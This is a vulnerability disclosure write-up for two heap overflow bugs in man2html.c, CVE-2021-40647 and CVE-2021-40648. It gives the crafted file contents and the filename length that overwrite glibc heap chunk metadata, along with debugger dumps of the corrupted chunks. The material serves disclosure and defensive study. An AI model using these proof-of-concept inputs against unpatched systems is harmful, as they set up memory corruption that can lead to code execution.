CVE-2021-40648: CVE-2021-40647 and CVE-2021-40648

CVE-2021-40647 and CVE-2021-40648

Here is the writeup for CVE-2021-40647.

A specific string being read in from a file will overwrite the size parameter in the top chunk of the heap. This at least causes the program to segmentation abort:

The user craft a file containing the string containing the bytes “\x27” * 1 ; '\x53’*2 ; ‘\x42’*19984’ ; '\xff’*16. This will cause a segmentation abort because the user would have overwritten the size parameter of the top chunk but misaligned the value causing glibc to output "corrupted size vs. prev_size". Example of the top_chunk is below.

Top chunk | IS_MMAPED

Addr: 0x555555779680

prev_size: 0x4242424242424242 <== User Data

size: 0xffffffffffffff42 <== User Data

fd: 0x44443c3e412f3cff

bk: 0xa3e

fd_nextsize: 0x00

bk_nextsize: 0x00

It can be seen the both the size and the prev size parameters are overwritten with user data. If the user craft a file containing the string containing the bytes “\x27” * 1 ; '\x53’*2 ; ‘\x42’*19983’ ; '\xff’*16. This allows the user to set the size of the top-chunk to any arbitrary value thus making the top-chunk size parameter whatever value they want. This is stopped in GLIBC version 2.29 due to sanity checks in the size parameter in the top-chunk but is valid in previous versions of glibc. Below is a example of a correctly aligned top-chunk full of user data. This DOES NOT crash the program due to it being aligned correctly.

Allocated chunk | PREV_INUSE | IS_MMAPED | NON_MAIN_ARENA

Addr: 0x555555779680

prev_size: 0x4242424242424242 <== User Data

size: 0xffffffffffffffff <== User Data

fd: 0x3e44443c3e412f3c

bk: 0x0a

fd_nextsize: 0x00

bk_nextsize: 0x00

Both errors occur at line 3203 of 'man2html.c’.

-------------------------------------------------------------------

Here is the information on CVE-2021-40648.

A filename can be created to overwrite the previous size parameter of the next chunk and the fd, bk, fd_nextsize, bk_nextsize of the current chunk. The next chunk is then freed later on causing a freeing of an arbitrary amount of memory. This DOES NOT crash the program:

The user can create a file of name 'A’*132 and overwrite the previous size parameter of the next chunk and the fd, bk, fd_nextsize, bk_nextsize of the current chunk. This happens at line 3155 of 'man2html.c’.

Before free at line 3191 of 'man2html.c’:

Allocated chunk | PREV_INUSE

Addr: 0x555555764660

prev_size: 0x00

size: 0x91

fd: 0x4141414141414141 <== User Data

bk: 0x4141414141414141 <== User Data

fd_nextsize: 0x4141414141414141 <== User Data

bk_nextsize: 0x4141414141414141 <== User Data

Allocated chunk | PREV_INUSE

Addr: 0x5555557646f0

prev_size: 0x41414141 <== User Data

size: 0x231

fd: 0xfbad2488

bk: 0x55555576497b

fd_nextsize: 0x55555576497b

bk_nextsize: 0x555555764960

After free at line 3194 of 'man2html.c’:

Allocated chunk | PREV_INUSE

Addr: 0x555555764660

prev_size: 0x00

size: 0x91

fd: 0x4141414141414141 <== User Data

bk: 0x4141414141414141 <== User Data

fd_nextsize: 0x4141414141414141 <== User Data

bk_nextsize: 0x4141414141414141 <== User Data

Free chunk (tcache) | PREV_INUSE

Addr: 0x5555557646f0

prev_size: 0x41414141 <== User Data

size: 0x231

fd: 0x00

bk: 0x555555764010

fd_nextsize: 0x00

bk_nextsize: 0x00